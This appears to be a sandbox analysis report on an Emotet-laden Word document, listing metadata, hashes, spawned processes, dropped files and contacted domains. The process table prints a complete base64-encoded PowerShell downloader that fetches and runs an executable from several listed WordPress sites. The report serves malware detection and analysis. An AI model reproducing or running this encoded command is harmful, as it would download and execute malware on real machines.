File name: | Report.doc |
Full analysis: | https://app.any.run/tasks/5788a647-6abb-4f87-b444-492bde931f1f |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | October 14, 2019, 17:20:12 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Expressway, Subject: Rubber, Author: Wilhelm Reynolds, Keywords: Ergonomic Rubber Cheese, Comments: integrated, Template: Normal.dotm, Last Saved By: Imani Kreiger, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Oct 14 15:06:00 2019, Last Saved Time/Date: Mon Oct 14 15:06:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 174, Security: 0 |
MD5: | 634FB174EB760789B41E3AE8EF70AD7A |
SHA1: | 6DAEAA9B5DE6145D811BF995CB541FBF4213D71B |
SHA256: | 8027F994B15A87A2979B7BC3D2859FE870F4E48390F4111A8CB2A5BDEC3ADE87 |
SSDEEP: | 3072:6qfzpFOKgdzSrGpKyIwLx3kV3ggo7V1FjDQJ1dLHHRBgD:6qfzpFOKUzSGnLx3kgjirnvg |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
Manager: | Parker |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 203 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | Carter - Mohr |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 174 |
Words: | 30 |
Pages: | 1 |
ModifyDate: | 2019:10:14 14:06:00 |
CreateDate: | 2019:10:14 14:06:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | Imani Kreiger |
Template: | Normal.dotm |
Comments: | integrated |
Keywords: | Ergonomic Rubber Cheese |
Author: | Wilhelm Reynolds |
Subject: | Rubber |
Title: | Expressway |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
960 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Report.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3716 | powershell -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABhADAAeABmADAANQA1ADAAZgAyAGUANQA2AGQAZABjAD0AJwBhADAAeAAxAGUANwA3AGIAOAA1ADEAZAA0ACcAOwAkAGEAMAB4AGIAMgBjAGMANwBkADAAMgAzADkAIAA9ACAAJwAzADEANwAnADsAJABhADAAeAA5ADkAOABmADEAOAA0ADIAMgBlADMAZgA9ACcAYQAwAHgAYgBhADUANQBmADAAMwBiAGUAMwBiADIAMQBkAGEAJwA7ACQAYQAwAHgAOQBhADIAYgA1AGEAMQAzADMAOABmADUAMAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAYQAwAHgAYgAyAGMAYwA3AGQAMAAyADMAOQArACcALgBlAHgAZQAnADsAJABhADAAeAAwADQAOQA4ADUAZAA3AGIANQA3AD0AJwBhADAAeAAyAGEAOAAxAGQAZABhAGMANwA1AGIAMgBlACcAOwAkAGEAMAB4ADIAZQAyADUAOQBhADcAOAA4ADQAPQAmACgAJwBuAGUAdwAtAG8AJwArACcAYgBqAGUAJwArACcAYwAnACsAJwB0ACcAKQAgAG4ARQBUAC4AVwBlAEIAQwBMAEkARQBOAHQAOwAkAGEAMAB4ADYANwBkAGEANwBmADkAOAAyADYANgA9ACcAaAB0AHQAcABzADoALwAvAGYAaQBsAGUAZwBzAHQALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAEsAbAAvACoAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBlAHIAYwBlAGsAbwAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvADEAZQBrADcALwAqAGgAdAB0AHAAcwA6AC8ALwBrAGEAbQBwAHUAcwBtAGEAbgBpAGEALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwA0AGYAMgBjADgALwAqAGgAdAB0AHAAcwA6AC8ALwB2AHAAcwAzADMAMwAuAGMAbwBtAC8AMAA3AGgAMwAxAC8AMQBnAGoAeQA5AC8AKgBoAHQAdABwADoALwAvAG4AdQB0AHQAbABlAGYAaQBiAGUAcgBhAHIAdAAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AZQBJAEQAQwBhAE8ALwAnAC4AIgBzAFAAYABMAGkAdAAiACgAJwAqACcAKQA7ACQAYQAwAHgAMwBmADcANwA4ADIANwAzAGEAYwA0ADUAZAA9ACcAYQAwAHgAOQA4ADAAYgBjADgAMwAxADMAZgBmACcAOwBmAG8AcgBlAGEAYwBoACgAJABhADAAeAA3ADYAZABiADIANABkADAAMQA3ACAAaQBuACAAJABhADAAeAA2ADcAZABhADcAZgA5ADgAMgA2ADYAKQB7AHQAcgB5AHsAJABhADAAeAAyAGUAMgA1ADkAYQA3ADgAOAA0AC4AIgBEAE8AYABXAGAATgBMAE8AQQBgAGQARgBpAGwAZQAiACgAJABhADAAeAA3ADYAZABiADIANABkADAAMQA3ACwAIAAkAGEAMAB4ADkAYQAyAGIANQBhADEAMwAzADgAZgA1ADAAKQA7ACQAYQAwAHgAYQA4ADcAYQBhADgANABjAGUAMAA5AGMAPQAnAGEAMAB4AGQANAA4ADcAZABlAGQAYgAzADEAMgBlACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQBJACcAKwAnAHQAJwArACcAZQBtACcAKQAgACQAYQAwAHgAOQBhADIAYgA1AGEAMQAzADMAOABmADUAMAApAC4AIgBMAGUAYABOAGcAdABIACIAIAAtAGcAZQAgADMAMAAzADIAMwApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAFQAYABBAFIAVAAiACgAJABhADAAeAA5AGEAMgBiADUAYQAxADMAMwA4AGYANQAwACkAOwAkAGEAMAB4AGUAMwA3ADgAMAA3ADgAMgA1AGEAYgA0ADkAZQBiAD0AJwBhADAAeABmADAAMAA2AGMAYgA4ADIANAAyAGYANQA1ADgAYwAnADsAYgByAGUAYQBrADsAJABhADAAeABkAGEAOQAwAGMANABmAGEAZgBlAGMAPQAnAGEAMAB4AGUAZgBjAGEAMwBkAGEAOQAxADgAZgA2AGIANAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABhADAAeAAwADIAZQA4ADUAMAAxAGUANgAyAGIAMQBiAGQAYwA9ACcAYQAwAHgAZQA0AGYAOQBhADQAZQAxAGEAYwAyACcA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
960 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA87F.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3716 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LGER12DZ6DQHPPYMHPPE.temp | — | |
MD5:— | SHA256:— | |||
960 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DAE2913C.wmf | wmf | |
MD5:451CCEC4E80B63056C7CF44829B810BB | SHA256:595D2B89005D0DCEECD29F64ADDF470CC69655E5C891713277D0A30BDE29FB66 | |||
960 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\14FCD6AA.wmf | wmf | |
MD5:2EED3F8E631BCCE318BE8B4AC8FC2F8A | SHA256:0634DCDFEB01C38C45867535C142801F51A44D0848E28E883447E00A11CC0FF6 | |||
960 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\24CCB12.wmf | wmf | |
MD5:46243598CFCA7B4DE308E6E240E2304E | SHA256:7C507E3B0F47BF6E6CD4A6D16B2ED373F587D0B822D42D645728BB269D20B1DB | |||
960 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Report.doc.LNK | lnk | |
MD5:6F9D4EC83961B17A8EBF41D1A3005F50 | SHA256:27BD71F82111F147E56A3CC6E48C4EFD216D76824D3380BAB6566B1CDF704A26 | |||
960 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\27B5ECF0.wmf | wmf | |
MD5:E277012212BE3BCEA8C46356205FDFDB | SHA256:633B58C0DC4C70A2468B84E5C1C6FAD82260D41E1A92051878473D0F20AE7CD1 | |||
960 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:CD2805DEB24A441BA9466FB0D3D77392 | SHA256:9AFA3B2D5AB87B1B00646B7B67818D015F82E4AB373CDE74536F4870809D3137 | |||
960 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EE9A7B64.wmf | wmf | |
MD5:1F0883953E0ED2453BF029CE85412531 | SHA256:1FB621CF1AB0D3FF6592B9F20FB8FCBCEFA4BEB5363190796D7CED7A74AEE676 | |||
960 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:30CBE5E535C4F181884515A89AC51856 | SHA256:B5B5E76D494C195EEFE2B0A0E08914F37780E4F6ACEA9D4F2E8A94A246D7BE1D |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3716 | powershell.exe | GET | 404 | 35.196.42.152:80 | http://nuttlefiberart.com/wp-admin/eIDCaO/ | US | xml | 345 b | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3716 | powershell.exe | 104.27.142.41:443 | www.merceko.com | Cloudflare Inc | US | unknown |
3716 | powershell.exe | 78.142.210.165:443 | kampusmania.com | JSC Mediasoft ekspert | RU | unknown |
3716 | powershell.exe | 35.196.42.152:80 | nuttlefiberart.com | Google Inc. | US | unknown |
3716 | powershell.exe | 161.117.183.16:443 | vps333.com | — | SG | unknown |
3716 | powershell.exe | 104.31.95.133:443 | filegst.com | Cloudflare Inc | US | shared |
Domain | IP | Reputation |
---|---|---|
filegst.com |
| unknown |
www.merceko.com |
| unknown |
kampusmania.com |
| unknown |
vps333.com |
| unknown |
nuttlefiberart.com |
| unknown |